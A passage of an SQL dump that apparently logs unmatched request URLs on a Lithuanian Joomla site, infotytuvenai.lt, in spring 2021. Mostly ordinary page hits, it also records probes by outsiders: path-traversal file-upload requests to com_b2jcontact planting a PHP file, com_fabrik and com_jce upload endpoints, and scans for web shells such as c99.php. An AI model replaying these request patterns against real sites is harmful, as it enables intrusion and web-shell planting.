00:00:00'),(4632,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=43:2014-m-finansines-ataskaitos&catid=2:uncategorised&Itemid=203','','','',22,0,'2021-03-23 14:47:26','0000-00-00 00:00:00'),(4633,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=51&Itemid=201','','','',37,0,'2021-03-24 12:41:55','0000-00-00 00:00:00'),(4634,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=37&Itemid=201','','','',24,0,'2021-03-24 14:16:49','0000-00-00 00:00:00'),(4635,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=43&Itemid=203','','','',32,0,'2021-03-25 01:43:44','0000-00-00 00:00:00'),(4636,'https://infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=12:isankstine-registracija&Itemid=124','','','',28,0,'2021-03-25 08:23:44','0000-00-00 00:00:00'),(4637,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/44-paskutinesnaujienos/338-naujas-darbo-laikas','','','',7,0,'2021-03-25 08:40:57','0000-00-00 00:00:00'),(4638,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/7','','https://www.infotytuvenai.lt/index.php/component/k2/item/7','',5,0,'2021-03-25 11:48:38','0000-00-00 00:00:00'),(4639,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/15','','https://www.infotytuvenai.lt/index.php/component/k2/item/15','',4,0,'2021-03-25 15:01:19','0000-00-00 00:00:00'),(4640,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/4','','https://www.infotytuvenai.lt/index.php/component/k2/item/4','',4,0,'2021-03-25 15:23:11','0000-00-00 00:00:00'),(4641,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/3','','https://www.infotytuvenai.lt/index.php/component/k2/item/3','',3,0,'2021-03-25 16:03:00','0000-00-00 00:00:00'),(4642,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/14','','https://www.infotytuvenai.lt/index.php/component/k2/item/14','',2,0,'2021-03-25 16:05:47','0000-00-00 00:00:00'),(4643,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/10','','https://www.infotytuvenai.lt/index.php/component/k2/item/10','',6,0,'2021-03-25 17:01:03','0000-00-00 00:00:00'),(4644,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=60&Itemid=201','','','',16,0,'2021-03-25 17:15:38','0000-00-00 00:00:00'),(4645,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/5','','https://www.infotytuvenai.lt/index.php/component/k2/item/5','',1,0,'2021-03-25 19:18:00','0000-00-00 00:00:00'),(4646,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/6','','https://www.infotytuvenai.lt/index.php/component/k2/item/6','',3,0,'2021-03-25 21:42:27','0000-00-00 00:00:00'),(4647,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/11','','https://www.infotytuvenai.lt/index.php/component/k2/item/11','',5,0,'2021-03-25 21:49:46','0000-00-00 00:00:00'),(4648,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/13','','https://www.infotytuvenai.lt/index.php/component/k2/item/13','',1,0,'2021-03-25 23:08:52','0000-00-00 00:00:00'),(4649,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/1','','https://www.infotytuvenai.lt/index.php/component/k2/item/1','',3,0,'2021-03-25 23:41:00','0000-00-00 00:00:00'),(4650,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/12','','https://www.infotytuvenai.lt/index.php/component/k2/item/12','',3,0,'2021-03-26 01:31:24','0000-00-00 00:00:00'),(4651,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=40:prevencines-programos&catid=2:uncategorised&Itemid=210','','','',38,0,'2021-03-26 01:35:16','0000-00-00 00:00:00'),(4652,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/8','','https://www.infotytuvenai.lt/index.php/component/k2/item/8','',1,0,'2021-03-26 03:41:43','0000-00-00 00:00:00'),(4653,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/plugins/system/helix/js/bootstrap.min.js','','http://www.infotytuvenai.lt','',1,0,'2021-03-26 11:02:34','0000-00-00 00:00:00'),(4654,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/media/system/js/caption.js','','http://www.infotytuvenai.lt','',1,0,'2021-03-26 11:02:34','0000-00-00 00:00:00'),(4655,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/media/system/js/core.js','','http://www.infotytuvenai.lt','',1,0,'2021-03-26 11:02:35','0000-00-00 00:00:00'),(4656,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/templates/tytuvenu_piligrimu_centras/js/fixed-menu.js','','http://www.infotytuvenai.lt','',1,0,'2021-03-26 11:02:35','0000-00-00 00:00:00'),(4657,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/plugins/system/helix/js/helix.core.js','','http://www.infotytuvenai.lt','',1,0,'2021-03-26 11:02:35','0000-00-00 00:00:00'),(4658,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/media/k2/assets/js/jquery-1.8.3.min.js','','http://www.infotytuvenai.lt','',1,0,'2021-03-26 11:02:35','0000-00-00 00:00:00'),(4659,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/components/com_k2/js/k2.js?v2.6.7&sitepath=/','','http://www.infotytuvenai.lt','',1,0,'2021-03-26 11:02:35','0000-00-00 00:00:00'),(4660,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/plugins/system/helix/js/jquery-noconflict.js','','http://www.infotytuvenai.lt','',1,0,'2021-03-26 11:02:36','0000-00-00 00:00:00'),(4661,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/plugins/system/helix/js/modernizr-2.6.2.min.js','','http://www.infotytuvenai.lt','',1,0,'2021-03-26 11:02:36','0000-00-00 00:00:00'),(4662,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/plugins/system/helix/js/menu.js','','http://www.infotytuvenai.lt','',1,0,'2021-03-26 11:02:36','0000-00-00 00:00:00'),(4663,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/media/system/js/mootools-core.js','','http://www.infotytuvenai.lt','',1,0,'2021-03-26 11:02:37','0000-00-00 00:00:00'),(4664,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=67:darbo-uzmokestis-5&catid=13&Itemid=197','','','',16,0,'2021-03-26 11:45:16','0000-00-00 00:00:00'),(4665,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=48:viesieji-pirkimai-3&catid=13:veikla&Itemid=197','','','',29,0,'2021-03-26 12:32:55','0000-00-00 00:00:00'),(4666,'https://www.infotytuvenai.lt/index.php/config.php','','','',1,0,'2021-03-26 13:01:25','0000-00-00 00:00:00'),(4667,'https://www.infotytuvenai.lt/index.php/lt/menu.php','','','',1,0,'2021-03-26 13:01:44','0000-00-00 00:00:00'),(4668,'https://www.infotytuvenai.lt/index.php/tasks.php','','','',1,0,'2021-03-26 13:01:51','0000-00-00 00:00:00'),(4669,'https://www.infotytuvenai.lt/index.php/lt/resources/images/ifpigscouldfly.ym','','','',1,0,'2021-03-26 13:02:09','0000-00-00 00:00:00'),(4670,'https://www.infotytuvenai.lt/index.php/lt/login.php','','','',2,0,'2021-03-26 13:02:30','0000-00-00 00:00:00'),(4671,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62:medicinos-normos&catid=13&Itemid=213','','','',33,0,'2021-03-26 16:11:28','0000-00-00 00:00:00'),(4672,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=39:finansines-ataskaitos&catid=13&Itemid=197','','','',27,0,'2021-03-26 16:26:35','0000-00-00 00:00:00'),(4673,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=47&Itemid=202','','','',40,0,'2021-03-26 18:43:15','0000-00-00 00:00:00'),(4674,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=37:darbo-uzmokestis&catid=13&Itemid=201','','','',22,0,'2021-03-26 19:42:44','0000-00-00 00:00:00'),(4675,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=40:prevencines-programos&catid=2:uncategorised&Itemid=210','','','',21,0,'2021-03-26 21:08:59','0000-00-00 00:00:00'),(4676,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=68:strategija&catid=13&Itemid=217','','','',21,0,'2021-03-26 22:02:18','0000-00-00 00:00:00'),(4677,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=45:2015-m-finansines-ataskaitos&catid=13&Itemid=197','','','',24,0,'2021-03-26 22:36:48','0000-00-00 00:00:00'),(4678,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=61&Itemid=212','','','',20,0,'2021-03-26 22:42:54','0000-00-00 00:00:00'),(4679,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=54&Itemid=201','','','',23,0,'2021-03-26 23:38:27','0000-00-00 00:00:00'),(4680,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=61:asmens-duomenu-apsauga&catid=2:uncategorised&Itemid=212','','','',19,0,'2021-03-27 01:19:11','0000-00-00 00:00:00'),(4681,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=36&Itemid=200','','','',22,0,'2021-03-27 02:13:08','0000-00-00 00:00:00'),(4682,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62:medicinos-normos&catid=13:veikla&Itemid=213','','','',42,0,'2021-03-27 02:18:29','0000-00-00 00:00:00'),(4683,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=47&Itemid=202','','','',22,0,'2021-03-27 02:49:34','0000-00-00 00:00:00'),(4684,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=50:darbo-uzmokestis-3&catid=13:veikla&Itemid=197','','','',24,0,'2021-03-27 05:23:33','0000-00-00 00:00:00'),(4685,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=53&Itemid=203','','','',18,0,'2021-03-27 06:12:45','0000-00-00 00:00:00'),(4686,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=57:su-narkotikais-susijusios-zalos-mazinimas&catid=2:uncategorised','','','',21,0,'2021-03-27 09:07:43','0000-00-00 00:00:00'),(4687,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=31:veiklos-licencija&catid=2:uncategorised','','','',30,0,'2021-03-27 09:20:25','0000-00-00 00:00:00'),(4688,'https://infotytuvenai.lt/index.php/lt/login','','','',19,0,'2021-03-27 10:29:00','0000-00-00 00:00:00'),(4689,'https://infotytuvenai.lt/index.php/lt/default.asp','','','',19,0,'2021-03-27 10:33:16','0000-00-00 00:00:00'),(4690,'https://infotytuvenai.lt/index.php/lt/c99.php','','','',19,0,'2021-03-27 10:33:17','0000-00-00 00:00:00'),(4691,'https://infotytuvenai.lt/index.php/lt/index.shtml','','','',19,0,'2021-03-27 10:33:17','0000-00-00 00:00:00'),(4692,'https://infotytuvenai.lt/index.php/lt/default.aspx','','','',19,0,'2021-03-27 10:33:17','0000-00-00 00:00:00'),(4693,'https://infotytuvenai.lt/index.php/lt/index.asp','','','',19,0,'2021-03-27 10:33:17','0000-00-00 00:00:00'),(4694,'https://infotytuvenai.lt/index.php/lt/?.jsp','','','',19,0,'2021-03-27 10:33:17','0000-00-00 00:00:00'),(4695,'https://infotytuvenai.lt/index.php/lt/index.jsp','','','',19,0,'2021-03-27 10:33:17','0000-00-00 00:00:00'),(4696,'https://infotytuvenai.lt/index.php/lt/default.php','','','',19,0,'2021-03-27 10:33:17','0000-00-00 00:00:00'),(4697,'https://infotytuvenai.lt/index.php/lt/index.cgi','','','',19,0,'2021-03-27 10:33:17','0000-00-00 00:00:00'),(4698,'https://infotytuvenai.lt/index.php/lt/index.aspx','','','',19,0,'2021-03-27 10:33:18','0000-00-00 00:00:00'),(4699,'https://infotytuvenai.lt/index.php/lt/index.cfm','','','',19,0,'2021-03-27 10:33:18','0000-00-00 00:00:00'),(4700,'https://infotytuvenai.lt/index.php/lt/default.jsp','','','',19,0,'2021-03-27 10:33:18','0000-00-00 00:00:00'),(4701,'https://infotytuvenai.lt/index.php/lt/default.shtml','','','',19,0,'2021-03-27 10:33:18','0000-00-00 00:00:00'),(4702,'https://infotytuvenai.lt/index.php/lt/wp-login.php','','','',22,0,'2021-03-27 10:33:18','0000-00-00 00:00:00'),(4703,'https://infotytuvenai.lt/index.php/lt/NeXposeSoft404.js','','','',38,0,'2021-03-27 10:33:18','0000-00-00 00:00:00'),(4704,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=54:darbo-uzmokestis-2017-m&catid=13:veikla&Itemid=197','','','',16,0,'2021-03-27 12:19:06','0000-00-00 00:00:00'),(4705,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=49:darbo-uzmokestis-2&catid=13:veikla&Itemid=197','','','',21,0,'2021-03-27 17:34:52','0000-00-00 00:00:00'),(4706,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=49&Itemid=201','','','',37,0,'2021-03-27 19:45:45','0000-00-00 00:00:00'),(4707,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=63:2018-m-finansines-ataskaitos&catid=13:veikla&Itemid=197','','','',13,0,'2021-03-27 19:51:37','0000-00-00 00:00:00'),(4708,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=66:finatas-2&catid=13&Itemid=197','','','',19,0,'2021-03-27 19:57:28','0000-00-00 00:00:00'),(4709,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=49:darbo-uzmokestis-2&catid=13:veikla&Itemid=197','','','',27,0,'2021-03-27 20:58:22','0000-00-00 00:00:00'),(4710,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/28','','https://www.infotytuvenai.lt/index.php/component/k2/item/28','',2,0,'2021-03-28 01:08:47','0000-00-00 00:00:00'),(4711,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=55:privatumo-politika&catid=2:uncategorised&Itemid=207','','','',25,0,'2021-03-28 01:54:52','0000-00-00 00:00:00'),(4712,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=58&Itemid=208','','','',20,0,'2021-03-28 02:23:11','0000-00-00 00:00:00'),(4713,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/19','','https://www.infotytuvenai.lt/index.php/component/k2/item/19','',1,0,'2021-03-28 02:50:50','0000-00-00 00:00:00'),(4714,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=36:vidaus-darbo-tvarkos-taisykles&catid=13:veikla&Itemid=200','','','',17,0,'2021-03-28 05:22:09','0000-00-00 00:00:00'),(4715,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=48:viesieji-pirkimai-3&catid=13&Itemid=197','','','',25,0,'2021-03-28 05:28:06','0000-00-00 00:00:00'),(4716,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/30','','https://www.infotytuvenai.lt/index.php/component/k2/item/30','',2,0,'2021-03-28 05:33:49','0000-00-00 00:00:00'),(4717,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=58:mokamos-paslaugos&catid=2:uncategorised&Itemid=208','','','',16,0,'2021-03-28 05:46:19','0000-00-00 00:00:00'),(4718,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=39&Itemid=203','','','',12,0,'2021-03-28 05:58:01','0000-00-00 00:00:00'),(4719,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/21','','https://www.infotytuvenai.lt/index.php/component/k2/item/21','',1,0,'2021-03-28 05:58:47','0000-00-00 00:00:00'),(4720,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=67:darbo-uzmokestis-5&catid=13:veikla&Itemid=197','','','',17,0,'2021-03-28 07:28:10','0000-00-00 00:00:00'),(4721,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/20','','https://www.infotytuvenai.lt/index.php/component/k2/item/20','',1,0,'2021-03-28 07:47:27','0000-00-00 00:00:00'),(4722,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/25','','https://www.infotytuvenai.lt/index.php/component/k2/item/25','',2,0,'2021-03-28 07:47:58','0000-00-00 00:00:00'),(4723,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=59:nemokamos-paslaugos&catid=2:uncategorised&Itemid=209','','','',31,0,'2021-03-28 08:23:50','0000-00-00 00:00:00'),(4724,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=60&Itemid=201','','','',42,0,'2021-03-28 08:48:28','0000-00-00 00:00:00'),(4725,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=30:teikiamos-paslaugos&catid=2:uncategorised&Itemid=204','','','',24,0,'2021-03-28 09:28:47','0000-00-00 00:00:00'),(4726,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/17','','https://www.infotytuvenai.lt/index.php/component/k2/item/17','',2,0,'2021-03-28 11:21:42','0000-00-00 00:00:00'),(4727,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=39:finansines-ataskaitos&catid=13:veikla&Itemid=197','','','',14,0,'2021-03-28 11:33:16','0000-00-00 00:00:00'),(4728,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/2','','https://www.infotytuvenai.lt/index.php/component/k2/item/2','',1,0,'2021-03-28 13:06:48','0000-00-00 00:00:00'),(4729,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=47:viesieji-pirkimai-2&catid=13:veikla&Itemid=197','','','',19,0,'2021-03-28 13:51:53','0000-00-00 00:00:00'),(4730,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/24','','https://www.infotytuvenai.lt/index.php/component/k2/item/24','',1,0,'2021-03-28 14:02:50','0000-00-00 00:00:00'),(4731,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=66:finatas-2&catid=13:veikla&Itemid=197','','','',24,0,'2021-03-28 14:12:52','0000-00-00 00:00:00'),(4732,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=63:2018-m-finansines-ataskaitos&catid=13:veikla&Itemid=197','','','',25,0,'2021-03-28 15:03:12','0000-00-00 00:00:00'),(4733,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/27','','https://www.infotytuvenai.lt/index.php/component/k2/item/27','',1,0,'2021-03-28 15:44:51','0000-00-00 00:00:00'),(4734,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=29','','','',40,0,'2021-03-28 16:01:24','0000-00-00 00:00:00'),(4735,'https://infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=21:paslaugu-atnaujinimo-planas&Itemid=124','','','',29,0,'2021-03-30 14:23:14','0000-00-00 00:00:00'),(4736,'https://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1617144759.php','','','',1,0,'2021-03-30 23:32:24','0000-00-00 00:00:00'),(4737,'https://www.infotytuvenai.lt/index.php/lt/?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload','','','',29,0,'2021-03-30 23:33:03','0000-00-00 00:00:00'),(4738,'https://www.infotytuvenai.lt/index.php/lt/?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form\"','','','',10,0,'2021-03-30 23:33:30','0000-00-00 00:00:00'),(4739,'https://www.infotytuvenai.lt/index.php/lt//robots.txt','','','',12,0,'2021-03-31 10:06:13','0000-00-00 00:00:00'),(4740,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=68:strategija&catid=13:veikla&Itemid=217','','','',28,0,'2021-03-31 18:43:32','0000-00-00 00:00:00'),(4741,'https://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_161722501.php','','','',1,0,'2021-03-31 21:35:11','0000-00-00 00:00:00'),(4742,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=61&Itemid=70','','','',1,0,'2021-04-01 10:00:24','0000-00-00 00:00:00'),(4743,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=40&Itemid=205','','','',16,0,'2021-04-04 19:58:36','0000-00-00 00:00:00'),(4744,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=43&Itemid=203','','','',25,0,'2021-04-05 12:00:26','0000-00-00 00:00:00'),(4745,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=39:finansines-ataskaitos&catid=13:veikla&Itemid=197','','','',25,0,'2021-04-06 22:22:36','0000-00-00 00:00:00'),(4746,'https://infotytuvenai.lt/index.php/lt/admin','','','',7,0,'2021-04-07 02:41:40','0000-00-00 00:00:00'),(4747,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=41&Itemid=211','','','',37,0,'2021-04-09 04:26:55','0000-00-00 00:00:00'),(4748,'https://www.infotytuvenai.lt/index.php/lt/?option=com_user&view=login','','https://www.infotytuvenai.lt/index.php?option=com_user&view=login','',23,0,'2021-04-11 14:42:08','0000-00-00 00:00:00'),(4749,'https://infotytuvenai.lt/index.php/lt/?option=com_k2&view=itemlist&layout=category&task=category&id=9&Itemid=124','','','',24,0,'2021-04-12 21:37:37','0000-00-00 00:00:00'),(4750,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=34&Itemid=198','','','',18,0,'2021-04-12 23:27:39','0000-00-00 00:00:00'),(4751,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=41&Itemid=206','','','',7,0,'2021-04-18 01:52:49','0000-00-00 00:00:00'),(4752,'https://infotytuvenai.lt/index.php/lt/components/com_k2/js/k2.js?v2.6.7&sitepath=/','','','',4,0,'2021-04-18 11:40:38','0000-00-00 00:00:00'),(4753,'https://infotytuvenai.lt/index.php/lt/media/system/js/caption.js','','','',4,0,'2021-04-18 11:40:38','0000-00-00 00:00:00'),(4754,'https://infotytuvenai.lt/index.php/lt/modules/mod_sp_smart_slider/tmpl/university/js/sp-smart-slider.js','','','',4,0,'2021-04-18 11:40:39','0000-00-00 00:00:00'),(4755,'https://infotytuvenai.lt/index.php/lt/plugins/system/helix/js/bootstrap.min.js','','','',4,0,'2021-04-18 11:40:39','0000-00-00 00:00:00'),(4756,'https://infotytuvenai.lt/index.php/lt/plugins/system/helix/js/helix.core.js','','','',4,0,'2021-04-18 11:40:39','0000-00-00 00:00:00'),(4757,'https://infotytuvenai.lt/index.php/lt/plugins/system/helix/js/jquery-noconflict.js','','','',4,0,'2021-04-18 11:40:39','0000-00-00 00:00:00'),(4758,'https://infotytuvenai.lt/index.php/lt/templates/tytuvenu_piligrimu_centras/js/fixed-menu.js','','','',4,0,'2021-04-18 11:40:40','0000-00-00 00:00:00'),(4759,'https://infotytuvenai.lt/index.php/lt/media/k2/assets/js/jquery-1.8.3.min.js','','','',4,0,'2021-04-18 11:40:40','0000-00-00 00:00:00'),(4760,'https://infotytuvenai.lt/index.php/lt/plugins/system/helix/js/modernizr-2.6.2.min.js','','','',4,0,'2021-04-18 11:40:39','0000-00-00 00:00:00'),(4761,'https://infotytuvenai.lt/index.php/lt/media/system/js/core.js','','','',4,0,'2021-04-18 11:40:40','0000-00-00 00:00:00'),(4762,'https://infotytuvenai.lt/index.php/lt/plugins/system/helix/js/menu.js','','','',4,0,'2021-04-18 11:40:40','0000-00-00 00:00:00'),(4763,'https://infotytuvenai.lt/index.php/lt/media/system/js/mootools-core.js','','','',4,0,'2021-04-18 11:40:40','0000-00-00 00:00:00'),(4764,'https://infotytuvenai.lt/index.php/lt/k.php','','','',1,0,'2021-04-18 21:51:31','0000-00-00 00:00:00'),(4765,'https://infotytuvenai.lt/index.php/lt/s.php','','','',1,0,'2021-04-18 21:51:32','0000-00-00 00:00:00'),(4766,'https://infotytuvenai.lt/index.php/lt/login.php','','','',8,0,'2021-04-18 21:51:32','0000-00-00 00:00:00'),(4767,'https://infotytuvenai.lt/index.php/lt/images/logo.gif','','','',1,0,'2021-04-18 21:51:33','0000-00-00 00:00:00'),(4768,'https://infotytuvenai.lt/index.php/lt/images/favicon.png','','','',1,0,'2021-04-18 21:51:34','0000-00-00 00:00:00'),(4769,'https://infotytuvenai.lt/index.php/lt/theme/style.css','','','',2,0,'2021-04-18 21:51:36','0000-00-00 00:00:00'),(4770,'https://infotytuvenai.lt/index.php/lt/ufr.php','','','',1,0,'2021-04-18 21:51:38','0000-00-00 00:00:00'),(4771,'https://infotytuvenai.lt/index.php/lt/auth.php','','','',1,0,'2021-04-18 21:51:39','0000-00-00 00:00:00'),(4772,'https://infotytuvenai.lt/index.php/lt/functions.php','','','',1,0,'2021-04-18 21:51:40','0000-00-00 00:00:00'),(4773,'https://infotytuvenai.lt/index.php/lt/search.php','','','',1,0,'2021-04-18 21:51:41','0000-00-00 00:00:00'),(4774,'https://infotytuvenai.lt/index.php/lt/admin.php','','','',4,0,'2021-04-18 21:51:43','0000-00-00 00:00:00'),(4775,'https://infotytuvenai.lt/index.php/lt/pages/clientinfo.php','','','',1,0,'2021-04-18 21:51:45','0000-00-00 00:00:00'),(4776,'https://infotytuvenai.lt/index.php/lt/Template/img/img15.png','','','',1,0,'2021-04-18 21:51:56','0000-00-00 00:00:00'),(4777,'https://infotytuvenai.lt/index.php/lt/f.st/c.index.txt','','','',1,0,'2021-04-18 21:51:57','0000-00-00 00:00:00'),(4778,'https://infotytuvenai.lt/index.php/lt/f.st/style.css','','','',1,0,'2021-04-18 21:51:58','0000-00-00 00:00:00'),(4779,'https://infotytuvenai.lt/index.php/lt/gateway.php','','','',1,0,'2021-04-18 21:51:59','0000-00-00 00:00:00'),(4780,'https://infotytuvenai.lt/index.php/lt/connect_meta.php','','','',1,0,'2021-04-18 21:52:00','0000-00-00 00:00:00'),(4781,'https://infotytuvenai.lt/index.php/lt/index.html','','','',1,0,'2021-04-18 21:52:01','0000-00-00 00:00:00'),(4782,'https://infotytuvenai.lt/index.php/lt/graphics/banner.png','','','',1,0,'2021-04-18 21:52:01','0000-00-00 00:00:00'),(4783,'https://infotytuvenai.lt/index.php/lt/login.php?op=login','','','',1,0,'2021-04-18 21:52:05','0000-00-00 00:00:00'),(4784,'https://infotytuvenai.lt/index.php/lt/project.php','','','',1,0,'2021-04-18 21:52:06','0000-00-00 00:00:00'),(4785,'https://infotytuvenai.lt/index.php/lt/android/admin.php','','','',1,0,'2021-04-18 21:52:12','0000-00-00 00:00:00'),(4786,'https://infotytuvenai.lt/index.php/lt/cron.php','','','',1,0,'2021-04-18 21:52:21','0000-00-00 00:00:00'),(4787,'https://infotytuvenai.lt/index.php/lt/logout.php','','','',1,0,'2021-04-18 21:52:21','0000-00-00 00:00:00'),(4788,'https://infotytuvenai.lt/index.php/lt/tasks.php','','','',2,0,'2021-04-18 21:52:22','0000-00-00 00:00:00'),(4789,'https://infotytuvenai.lt/index.php/lt/stats.php','','','',1,0,'2021-04-18 21:52:23','0000-00-00 00:00:00'),(4790,'https://infotytuvenai.lt/index.php/lt/run.php','','','',1,0,'2021-04-18 21:52:24','0000-00-00 00:00:00'),(4791,'https://infotytuvenai.lt/index.php/lt/asdfddsas.php','','','',1,0,'2021-04-18 21:52:25','0000-00-00 00:00:00'),(4792,'https://infotytuvenai.lt/index.php/lt/tmp','','','',1,0,'2021-04-18 21:52:29','0000-00-00 00:00:00'),(4793,'https://infotytuvenai.lt/index.php/lt/tmp/','','','',1,0,'2021-04-18 21:52:30','0000-00-00 00:00:00'),(4794,'https://infotytuvenai.lt/index.php/lt/vendor','','','',1,0,'2021-04-18 21:52:30','0000-00-00 00:00:00'),(4795,'https://infotytuvenai.lt/index.php/lt/vendor/','','','',1,0,'2021-04-18 21:52:31','0000-00-00 00:00:00'),(4796,'https://infotytuvenai.lt/index.php/lt/lib','','','',1,0,'2021-04-18 21:52:32','0000-00-00 00:00:00'),(4797,'https://infotytuvenai.lt/index.php/lt/lib/','','','',1,0,'2021-04-18 21:52:33','0000-00-00 00:00:00'),(4798,'https://infotytuvenai.lt/index.php/lt/app','','','',1,0,'2021-04-18 21:52:34','0000-00-00 00:00:00'),(4799,'https://infotytuvenai.lt/index.php/lt/app/','','','',1,0,'2021-04-18 21:52:34','0000-00-00 00:00:00'),(4800,'https://infotytuvenai.lt/index.php/lt/tmp/logs','','','',1,0,'2021-04-18 21:52:35','0000-00-00 00:00:00'),(4801,'https://infotytuvenai.lt/index.php/lt/tmp/logs/','','','',1,0,'2021-04-18 21:52:36','0000-00-00 00:00:00'),(4802,'https://infotytuvenai.lt/index.php/lt/uploads','','','',1,0,'2021-04-18 21:52:37','0000-00-00 00:00:00'),(4803,'https://infotytuvenai.lt/index.php/lt/uploads/','','','',1,0,'2021-04-18 21:52:38','0000-00-00 00:00:00'),(4804,'https://infotytuvenai.lt/index.php/lt/public','','','',1,0,'2021-04-18 21:52:39','0000-00-00 00:00:00'),(4805,'https://infotytuvenai.lt/index.php/lt/public/','','','',1,0,'2021-04-18 21:52:39','0000-00-00 00:00:00'),(4806,'https://infotytuvenai.lt/index.php/lt/img/logo.png','','','',3,0,'2021-04-18 21:52:44','0000-00-00 00:00:00'),(4807,'https://infotytuvenai.lt/index.php/lt/classes/Clients.php','','','',1,0,'2021-04-18 21:52:49','0000-00-00 00:00:00'),(4808,'https://infotytuvenai.lt/index.php/lt/counter.php','','','',1,0,'2021-04-18 21:52:49','0000-00-00 00:00:00'),(4809,'https://infotytuvenai.lt/index.php/lt/blacknet.sql','','','',1,0,'2021-04-18 21:52:50','0000-00-00 